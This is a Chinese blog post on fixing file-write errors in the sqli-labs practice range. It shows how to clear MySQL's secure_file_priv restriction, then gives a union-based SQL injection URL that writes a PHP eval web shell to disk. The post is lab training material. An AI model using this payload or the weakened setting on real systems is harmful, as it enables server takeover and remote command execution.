sqli-labs靶场无法写入问题it cannot execute和error in your SQL syntax

举报
黑色地带(崛起) 发表于 2023/02/16 13:05:20 2023/02/16
【摘要】 sqli-labs靶场无法写入问题解决“ it cannot execute this statement”和“You have an error in your SQL syntax”

sqli-labs靶场无法写入问题解决“ it cannot execute this statement”和“You have an error in your SQL syntax”

 错误重现:

错误一:

You have an error in your SQL syntax

(且指定写入的部位没有写入文件)

编辑


错误二:

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

(无法写入文件)

编辑编辑





查看错误原因+解决方法:

原因:

官方文档说,secure_file_priv参数用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()传到哪个指定目录

1.secure_file_priv为NULL时,不允许导入或导出。
2.secure_file_priv为/tmp时,只能在/tmp目录中执行导入导出。
3.secure_file_priv没有值时,不限制在任意目录的导入导出。


第一步:

(打开数据库详细过程:手动打开数据库

打开数据库后输入

show global variables like '%secure%';

查看secure_file_priv 的值,发现为NULL,表示限制不能导入导出

编辑


第二步:

打开数据库文件夹--------找到下目录下的my.ini ---------打开它

编辑


在 里面写入下面这句话--------并保存

secure_file_priv=""

编辑


重启数据库

然后再打开数据库命令行输入

show variables like '%secure%';

编辑



再在sqli-labs-master中的靶场执行写入操作

虽然提示错误,但是已经写进去了

http://localhost:8080/sqli-labs-master/Less-7/
?id=-1')) union select 1,"<?php @eval($_GET['cmd']); ?>",3 into outfile "D:\\BaiduNetdiskDownload\\phpstudy\\phpstudy_pro\\2.txt" --+

编辑

 看看文件目录,已经写进去了

编辑

大功告成




【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
SQL 数据库
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入